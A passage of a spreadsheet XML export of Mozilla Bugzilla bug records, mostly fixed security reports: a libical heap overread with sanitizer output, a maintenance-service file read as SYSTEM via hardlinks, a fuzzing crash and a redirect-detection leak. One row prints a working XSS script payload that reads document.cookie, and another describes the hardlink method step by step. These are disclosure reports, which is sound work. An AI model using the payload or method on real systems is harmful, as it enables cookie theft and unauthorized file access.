        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P5720" t="inlineStr"/>
      <c r="Q5720" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5720" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5720" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5720" t="n">
        <v>0</v>
      </c>
      <c r="U5720" t="n">
        <v>0</v>
      </c>
      <c r="V5720" t="n">
        <v>10</v>
      </c>
      <c r="W5720" t="inlineStr">
        <is>
          <t>Created attachment 8763671
get_char_test.ics
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
Creating a small test harness passing a given input to icalparser_parse_string, I was able to find the attached input causes a heap overread in parser_get_next_char. This was tested against libical 0.47 from Thunderbird and libical latest.
Unfortunately, I am unable to compile Thunderbird with ASan support in order to give a better idea of affected code paths. The affected code calling icalparser_parse_string can be found at: https://dxr.mozilla.org/comm-central/search?q=icalparser_parse_string
Actual results:
The ASan results are below
=================================================================
==2492==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000cacf at pc 0x0000004fa35b bp 0x7ffef5e63fd0 sp 0x7ffef5e63fc8
READ of size 1 at 0x60400000cacf thread T0
    #0 0x4fa35a in parser_get_next_char (/root/tmp/new_parse/parse_string047_asan+0x4fa35a)
    #1 0x4f8541 in parser_get_param_name (/root/tmp/new_parse/parse_string047_asan+0x4f8541)
    #2 0x4f2d04 in icalparser_add_line (/root/tmp/new_parse/parse_string047_asan+0x4f2d04)
    #3 0x4efabe in icalparser_parse (/root/tmp/new_parse/parse_string047_asan+0x4efabe)
    #4 0x4f9c1f in icalparser_parse_string (/root/tmp/new_parse/parse_string047_asan+0x4f9c1f)
    #5 0x4eb7ef in main (/root/tmp/new_parse/parse_string047_asan+0x4eb7ef)
    #6 0x7ff0fac46a3f in __libc_start_main /build/glibc-ryFjv0/glibc-2.21/csu/libc-start.c:289
    #7 0x444ae8 in _start (/root/tmp/new_parse/parse_string047_asan+0x444ae8)
0x60400000cacf is located 1 bytes to the left of 39-byte region [0x60400000cad0,0x60400000caf7)
allocated by thread T0 here:
    #0 0x4cbab2 in malloc (/root/tmp/new_parse/parse_string047_asan+0x4cbab2)
    #1 0x5c443d in icalmemory_new_buffer (/root/tmp/new_parse/parse_string047_asan+0x5c443d)
    #2 0x4ed798 in make_segment (/root/tmp/new_parse/parse_string047_asan+0x4ed798)
    #3 0x4f8049 in parser_get_next_parameter (/root/tmp/new_parse/parse_string047_asan+0x4f8049)
    #4 0x4f2aac in icalparser_add_line (/root/tmp/new_parse/parse_string047_asan+0x4f2aac)
    #5 0x4efabe in icalparser_parse (/root/tmp/new_parse/parse_string047_asan+0x4efabe)
    #6 0x4f9c1f in icalparser_parse_string (/root/tmp/new_parse/parse_string047_asan+0x4f9c1f)
    #7 0x4eb7ef in main (/root/tmp/new_parse/parse_string047_asan+0x4eb7ef)
    #8 0x7ff0fac46a3f in __libc_start_main /build/glibc-ryFjv0/glibc-2.21/csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 parser_get_next_char
Shadow bytes around the buggy address:
  0x0c087fff9900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c087fff9950: fa fa fa fa fa fa fa fa fa[fa]00 00 00 00 07 fa
  0x0c087fff9960: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
  0x0c087fff9970: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 05
  0x0c087fff9980: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
  0x0c087fff9990: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
  0x0c087fff99a0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00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492==ABORTING
Expected results:
Not read past the allocated space</t>
        </is>
      </c>
      <c r="X5720" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5721">
      <c r="A5721" t="n">
        <v>1336979</v>
      </c>
      <c r="B5721" t="inlineStr">
        <is>
          <t>2017-02-06 06:30:27 -0800</t>
        </is>
      </c>
      <c r="C5721" t="inlineStr">
        <is>
          <t>32 byte arbitrary file reads as SYSTEM with maintenance service</t>
        </is>
      </c>
      <c r="D5721" t="inlineStr">
        <is>
          <t>2024-05-30 09:28:56 -0700</t>
        </is>
      </c>
      <c r="E5721" t="n">
        <v>1</v>
      </c>
      <c r="F5721" t="n">
        <v>1</v>
      </c>
      <c r="G5721" t="n">
        <v>3</v>
      </c>
      <c r="H5721" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5721" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5721" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5721" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L5721" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5721" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5721" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5721" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5721" t="inlineStr">
        <is>
          <t>[adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q5721" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5721" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5721" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5721" t="n">
        <v>1</v>
      </c>
      <c r="U5721" t="n">
        <v>0</v>
      </c>
      <c r="V5721" t="n">
        <v>22</v>
      </c>
      <c r="W5721" t="inlineStr">
        <is>
          <t>Created attachment 8833974
proof-of-concept
An unprivileged (standard) user can use the maintenance service to read the first 32 bytes of any file as the _SYSTEM user. Which isn't amazing, but still better than nothing :)
For example, running the poc with arbitrary_read.rb "C:\Users\Seb\creds.txt" will return the first 32 bytes of the first line in the shell. The full 32 bytes of multiline files can be seen in the C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log file.
The root cause is that we can trick the maintenance service into reading an arbitrary file in IsStatusApplying [0] by providing a hardlinked update.status where it expects one from the updater.exe. Even though the updater.exe runs, it seems to do so in such a way that it doesn't remove/update the update.status that we have prepared.
When the maintenance service goes to read the update.status from the updater, instead it reads the hardlinked file as _SYSTEM. It then writes this to the maintenanceservice.log file [1], which is world-readable.
The buffer is only 32 bytes long, so that's all we get out of the file. If all 32 bytes are read, the buf string isn't null terminated so the memory past the end of the buffer is logged as well (until it hits a null byte).
The proof of concept is a little bit rushed sorry - although you can create a hardlinked file as an unprivileged user, I've been having trouble deleting them without elevating. Either elevating and removing the hardlink before rerunning the poc, or using a different directory should fix that. The CreateHardlink binary is a compiled version from https://github.com/google/symboliclink-testing-tools/tree/master/CreateHardlink.
Tested on Windows 8.1 x64, Firefox 51.0.1 as well as mozilla-central.
[0] - https://dxr.mozilla.org/mozilla-central/rev/1d025ac534a6333a8170a59a95a8a3673d4028ee/toolkit/components/maintenanceservice/workmonitor.cpp#69
[1] - https://dxr.mozilla.org/mozilla-central/rev/1d025ac534a6333a8170a59a95a8a3673d4028ee/toolkit/components/maintenanceservice/workmonitor.cpp#74</t>
        </is>
      </c>
      <c r="X5721" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5722">
      <c r="A5722" t="n">
        <v>146447</v>
      </c>
      <c r="B5722" t="inlineStr">
        <is>
          <t>2002-05-23 08:40:00 -0700</t>
        </is>
      </c>
      <c r="C5722" t="inlineStr">
        <is>
          <t>cross-site scripting bug with bugzilla user's name</t>
        </is>
      </c>
      <c r="D5722" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E5722" t="n">
        <v>1</v>
      </c>
      <c r="F5722" t="n">
        <v>1</v>
      </c>
      <c r="G5722" t="n">
        <v>4</v>
      </c>
      <c r="H5722" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5722" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5722" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5722" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5722" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5722" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5722" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5722" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5722" t="inlineStr">
        <is>
          <t>[SECURITY] applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q5722" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5722" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5722" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5722" t="n">
        <v>1</v>
      </c>
      <c r="U5722" t="n">
        <v>0</v>
      </c>
      <c r="V5722" t="n">
        <v>22</v>
      </c>
      <c r="W5722" t="inlineStr">
        <is>
          <t>I changed my full name to &lt;b&gt;Jan!&lt;/b&gt; and that worked (as in: bold font).
Similary, when I changed it to
Jan! &lt;script&gt;alert("XSS: see bug #!\n\n" + document.cookie)&lt;/script&gt;
that ran the script without a hitch. This is a simple way to steal people's
cookies, and should be avoided, by escaping/"de-HTML-ing" any and all user input.</t>
        </is>
      </c>
      <c r="X5722" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5723">
      <c r="A5723" t="n">
        <v>1740534</v>
      </c>
      <c r="B5723" t="inlineStr">
        <is>
          <t>2021-11-10 07:43:49 -0800</t>
        </is>
      </c>
      <c r="C5723" t="inlineStr">
        <is>
          <t>Assertion failure: mBodyStream, at /dom/base/BodyStream.cpp:54</t>
        </is>
      </c>
      <c r="D5723" t="inlineStr">
        <is>
          <t>2022-08-26 23:29:33 -0700</t>
        </is>
      </c>
      <c r="E5723" t="n">
        <v>1</v>
      </c>
      <c r="F5723" t="n">
        <v>1</v>
      </c>
      <c r="G5723" t="n">
        <v>3</v>
      </c>
      <c r="H5723" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5723" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5723" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K5723" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5723" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5723" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5723" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5723" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5723" t="inlineStr">
        <is>
          <t>[bugmon:confirm][adv-main96+r][adv-esr91.6+r]</t>
        </is>
      </c>
      <c r="Q5723" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5723" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5723" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T5723" t="n">
        <v>1</v>
      </c>
      <c r="U5723" t="n">
        <v>0</v>
      </c>
      <c r="V5723" t="n">
        <v>41</v>
      </c>
      <c r="W5723" t="inlineStr">
        <is>
          <t>Testcase found while fuzzing mozilla-central rev 333f08065c8c (built with: --enable-debug --enable-fuzzing).
Testcase can be reproduced using the following commands:
```
$ pip install fuzzfetch grizzly-framework
$ python -m fuzzfetch --build 333f08065c8c --debug --fuzzing -n firefox
$ python -m grizzly.replay ./firefox/firefox testcase.zip --repeat 10
```
```
Assertion failure: mBodyStream, at /dom/base/BodyStream.cpp:54
    ==721216==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f4a52b40f70 bp 0x7f4a484db430 sp 0x7f4a484db3f0 T721294)
    ==721216==The signal is caused by a WRITE memory access.
    ==721216==Hint: address points to the zero page.
        #0 0x7f4a52b40f70 in ForgetBodyStream /dom/base/BodyStream.cpp:54:3
        #1 0x7f4a52b40f70 in mozilla::dom::BodyStream::ReleaseObjects(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /dom/base/BodyStream.cpp:545:18
        #2 0x7f4a52b41916 in mozilla::dom::BodyStream::Close() /dom/base/BodyStream.cpp
        #3 0x7f4a52b3f4eb in operator() /dom/base/BodyStream.cpp:98:51
        #4 0x7f4a52b3f4eb in ~ScopeExit /builds/worker/workspace/obj-build/dist/include/mozilla/ScopeExit.h:106:7
        #5 0x7f4a52b3f4eb in mozilla::dom::BodyStream::Create(JSContext*, mozilla::dom::BodyStreamHolder*, nsIGlobalObject*, nsIInputStream*, mozilla::ErrorResult&amp;) /dom/base/BodyStream.cpp:151:1
        #6 0x7f4a544a322d in mozilla::dom::FetchBody&lt;mozilla::dom::Response&gt;::GetBody(JSContext*, JS::MutableHandle&lt;JSObject*&gt;, mozilla::ErrorResult&amp;) /dom/fetch/Fetch.cpp:1394:3
        #7 0x7f4a53492eed in mozilla::dom::Response_Binding::get_body(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitGetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/ResponseBinding.cpp:1295:24
        #8 0x7f4a54053fdf in bool mozilla::dom::binding_detail::GenericGetter&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /dom/bindings/BindingUtils.cpp:3182:13
        #9 0x7f4a5795e5bf in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&amp;) /js/src/vm/Interpreter.cpp:385:13
        #10 0x7f4a5795dcbb in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /js/src/vm/Interpreter.cpp:472:12
        #11 0x7f4a5795f79e in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /js/src/vm/Interpreter.cpp:532:10
        #12 0x7f4a5796082f in Call /js/src/vm/Interpreter.cpp:549:8
        #13 0x7f4a5796082f in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /js/src/vm/Interpreter.cpp:675:10
        #14 0x7f4a57ccda0f in CallGetter /js/src/vm/NativeObject.cpp:1942:12
        #15 0x7f4a57ccda0f in bool GetExistingProperty&lt;(js::AllowGC)1&gt;(JSContext*, js::MaybeRooted&lt;JS::Value, (js::AllowGC)1&gt;::HandleType, js::MaybeRooted&lt;js::NativeObject*, (js::AllowGC)1&gt;::HandleType, js::MaybeRooted&lt;JS::PropertyKey, (js::AllowGC)1&gt;::HandleType, js::PropertyInfoBase&lt;unsigned int&gt;, js::MaybeRooted&lt;JS::Value, (js::AllowGC)1&gt;::MutableHandleType) /js/src/vm/NativeObject.cpp:1970:12
        #16 0x7f4a57cce0a3 in bool NativeGetPropertyInline&lt;(js::AllowGC)1&gt;(JSContext*, js::MaybeRooted&lt;js::NativeObject*, (js::AllowGC)1&gt;::HandleType, js::MaybeRooted&lt;JS::Value, (js::AllowGC)1&gt;::HandleType, js::MaybeRooted&lt;JS::PropertyKey, (js::AllowGC)1&gt;::HandleType, IsNameLookup, js::MaybeRooted&lt;JS::Value, (js::AllowGC)1&gt;::MutableHandleType) /js/src/vm/NativeObject.cpp:2116:14
        #17 0x7f4a579647ef in GetProperty /js/src/vm/ObjectOperations-inl.h:115:10
        #18 0x7f4a579647ef in js::GetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, js::PropertyName*, JS::MutableHandle&lt;JS::Value&gt;) /js/src/vm/ObjectOperations-inl.h:122:10
        #19 0x7f4a57963ca0 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /js/src/vm/Interpreter.cpp:4548:10
        #20 0x7f4a579529bb in GetPropertyOperation /js/src/vm/Interpreter.cpp:203:10
        #21 0x7f4a579529bb in Interpret(JSContext*, js::RunState&amp;) /js/src/vm/Interpreter.cpp:2904:12
        #22 0x7f4a5794bbe5 in js::RunScript(JSContext*, js::RunState&amp;) /js/src/vm/Interpreter.cpp:354:13
        #23 0x7f4a5795dbb6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /js/src/vm/Interpreter.cpp:504:13
        #24 0x7f4a5795f79e in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /js/src/vm/Interpreter.cpp:532:10
        #25 0x7f4a5795f9a1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /js/src/vm/Interpreter.cpp:549:8
        #26 0x7f4a57b17c21 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /js/src/vm/CallAndConstruct.cpp:117:10
        #27 0x7f4a53df182c in mozilla::dom::VoidFunction::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:81:8
        #28 0x7f4a52d81e25 in mozilla::dom::VoidFunction::Call(mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:172:12
        #29 0x7f4a52d81c0e in QueuedMicrotask::Run(mozilla::AutoSlowOperation&amp;) /dom/base/nsIGlobalObject.cpp:271:31
        #30 0x7f4a50dcec18 in mozilla::CycleCollectedJSContext::PerformMicroTaskCheckPoint(bool) /xpcom/base/CycleCollectedJSContext.cpp:674:17
        #31 0x7f4a50dcfa3c in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /xpcom/base/CycleCollectedJSContext.cpp:463:3
        #32 0x7f4a50efa45a in nsThread::ProcessNextEvent(bool, bool*) /xpcom/threads/nsThread.cpp:1212:24
        #33 0x7f4a50f0126a in NS_ProcessNextEvent(nsIThread*, bool) /xpcom/threads/nsThreadUtils.cpp:467:10
        #34 0x7f4a554243d8 in mozilla::dom::WorkerPrivate::DoRunLoop(JSContext*) /dom/workers/WorkerPrivate.cpp:3105:7
        #35 0x7f4a554047a7 in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /dom/workers/RuntimeService.cpp:2244:42
        #36 0x7f4a50efa149 in nsThread::ProcessNextEvent(bool, bool*) /xpcom/threads/nsThread.cpp:1169:16
        #37 0x7f4a50f0126a in NS_ProcessNextEvent(nsIThread*, bool) /xpcom/threads/nsThreadUtils.cpp:467:10
        #38 0x7f4a5198e624 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /ipc/glue/MessagePump.cpp:330:5
        #39 0x7f4a518ac9f7 in MessageLoop::RunInternal() /ipc/chromium/src/base/message_loop.cc:331:10
        #40 0x7f4a518ac902 in RunHandler /ipc/chromium/src/base/message_loop.cc:324:3
        #41 0x7f4a518ac902 in MessageLoop::Run() /ipc/chromium/src/base/message_loop.cc:306:3
        #42 0x7f4a50ef5dbb in nsThread::ThreadFunc(void*) /xpcom/threads/nsThread.cpp:391:10
        #43 0x7f4a67a98a07 in _pt_root /nsprpub/pr/src/pthreads/ptthread.c:201:5
        #44 0x7f4a6880c608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477:8
        #45 0x7f4a683d4292 in __clone /build/glibc-eX1tMB/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
    UndefinedBehaviorSanitizer can not provide additional info.
    SUMMARY: UndefinedBehaviorSanitizer: SEGV /dom/base/BodyStream.cpp:54:3 in ForgetBodyStream
    ==721216==ABORTING
```</t>
        </is>
      </c>
      <c r="X5723" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5724">
      <c r="A5724" t="n">
        <v>1751678</v>
      </c>
      <c r="B5724" t="inlineStr">
        <is>
          <t>2022-01-24 02:54:40 -0800</t>
        </is>
      </c>
      <c r="C5724" t="inlineStr">
        <is>
          <t>Detecting cross-origin redirects using the performance API</t>
        </is>
      </c>
      <c r="D5724" t="inlineStr">
        <is>
          <t>2024-05-30 10:53:29 -0700</t>
        </is>
      </c>
      <c r="E5724" t="n">
        <v>1</v>
      </c>
      <c r="F5724" t="n">
        <v>1</v>
      </c>
      <c r="G5724" t="n">
        <v>3</v>
      </c>
      <c r="H5724" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5724" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5724" t="inlineStr">
        <is>
          <t>Performance</t>
        </is>
      </c>
      <c r="K5724" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5724" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5724" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5724" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][adv-main100+]</t>
        </is>
      </c>
      <c r="Q5724" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5724" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5724" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T5724" t="n">
        <v>1</v>
      </c>
      <c r="U5724" t="n">
        <v>0</v>
      </c>
      <c r="V5724" t="n">
        <v>12</v>
      </c>
      <c r="W5724" t="inlineStr">
        <is>
          <t>Created attachment 9260357
index.html
Found this while digging around while reporting a similar bug in Chrome. When advanced tracking protection is turned off, we can detect whether or not a cross-origin URL is a redirect using the difference of `performance.getEntriesByName(...)[0].fetchStart - performance.getEntriesByName(...)[0].startTime`. 
Reproduction steps:
1) Download the attached index.html file.
2) Run a python HTTP server by running `python -m http.server` in the same directory as the index.html file.
3) Open http://localhost:8000/index.html in Firefox
4) Open the javascript console
5) https://google.com should be correctly identified as a redirect, whereas, https://www.google.com should be identified as a URL without a redirect.</t>
        </is>
      </c>
      <c r="X5724" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5725">
      <c r="A5725" t="n">
        <v>156698</v>
      </c>
      <c r="B5725" t="inlineStr">
        <is>
          <t>2002-07-10 09:45:01 -0700</t>
        </is>
      </c>
      <c r="C5725" t="inlineStr">
        <is>
          <t>[META] Support for Windows XP SP1 Integration</t>
        </is>
      </c>
      <c r="D5725" t="inlineStr">
        <is>
          <t>2016-07-15 12:13:22 -0700</t>
        </is>
      </c>
      <c r="E5725" t="n">
        <v>1</v>
      </c>
      <c r="F5725" t="n">
        <v>1</v>
      </c>
      <c r="G5725" t="n">
        <v>6</v>
      </c>
      <c r="H5725" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5725" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5725" t="inlineStr">
        <is>
          <t>Tracking</t>
        </is>
      </c>
      <c r="K5725" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5725" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5725" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5725" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5725" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5725" t="inlineStr">
        <is>
          <t>[ETA 07/16]</t>
        </is>
      </c>
      <c r="Q5725" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5725" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5725" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T5725" t="n">
        <v>1</v>
      </c>
      <c r="U5725" t="n">
        <v>0</v>
      </c>
      <c r="V5725" t="n">
        <v>30</v>
      </c>
      <c r="W5725" t="inlineStr">
        <is>
          <t>This is a meta tracking bug designed to track work for Windows XP Integration
targeted for the next release. Someone will nominate (or file) a bug. The ADT
will evaluate that bug, determine if it is needed for the next release, and will
add it as a dependency on this meta bug (if needed). Please don't
add bugs directly to this bug without going through the ADT first.</t>
        </is>
      </c>
      <c r="X5725" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5726">
      <c r="A5726" t="n">
        <v>707051</v>
      </c>
      <c r="B5726" t="inlineStr">
        <is>
          <t>2011-12-01 18:13:52 -0800</t>
        </is>
      </c>
      <c r="C5726" t="inlineStr">
        <is>
          <t>Failure to mark some shapes during delayed marking</t>
        </is>
      </c>
      <c r="D5726" t="inlineStr">
        <is>
          <t>2012-03-23 13:30:36 -0700</t>
        </is>
      </c>
      <c r="E5726" t="n">
        <v>1</v>
      </c>
      <c r="F5726" t="n">
        <v>1</v>
      </c>
      <c r="G5726" t="n">
        <v>3</v>
      </c>
      <c r="H5726" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5726" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5726" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5726" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5726" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5726" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5726" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5726" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5726" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q5726" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5726" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5726" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T5726" t="n">
        <v>1</v>
      </c>
      <c r="U5726" t="n">
        <v>0</v>
      </c>
      <c r="V5726" t="n">
        <v>27</v>
      </c>
      <c r="W5726" t="inlineStr">
        <is>
          <t>Created attachment 578462
fix
When we do delayed marking, we call JS_TraceChildren on each marked object in the arena. It calls MarkChildren. When given a shape, MarkChildren fails to set the marked bit for its parent shape--it just walks up the shape tree. I stumbled upon this while doing incremental GC, but it suggests that we need to do better testing of delayed marking--probably via bug 673551.
In the patch, I had to change the return type of previous() so that the write barrier checks don't complain.</t>
        </is>
      </c>
      <c r="X5726" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5727">
      <c r="A5727" t="n">
        <v>1436113</v>
      </c>
      <c r="B5727" t="inlineStr">
        <is>
          <t>2018-02-06 10:16:42 -0800</t>
        </is>
      </c>
      <c r="C5727" t="inlineStr">
        <is>
          <t>Convert from a system add-on into a component</t>
        </is>
      </c>
      <c r="D5727" t="inlineStr">
        <is>
          <t>2018-10-14 13:51:11 -0700</t>
        </is>
      </c>
      <c r="E5727" t="n">
        <v>1</v>
      </c>
      <c r="F5727" t="n">
        <v>1</v>
      </c>
      <c r="G5727" t="n">
        <v>2</v>
      </c>
      <c r="H5727" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5727" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5727" t="inlineStr">
        <is>
          <t>Normandy Client</t>
        </is>
      </c>
      <c r="K5727" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5727" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5727" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5727" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5727" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5727" t="inlineStr"/>
      <c r="Q5727" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5727" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
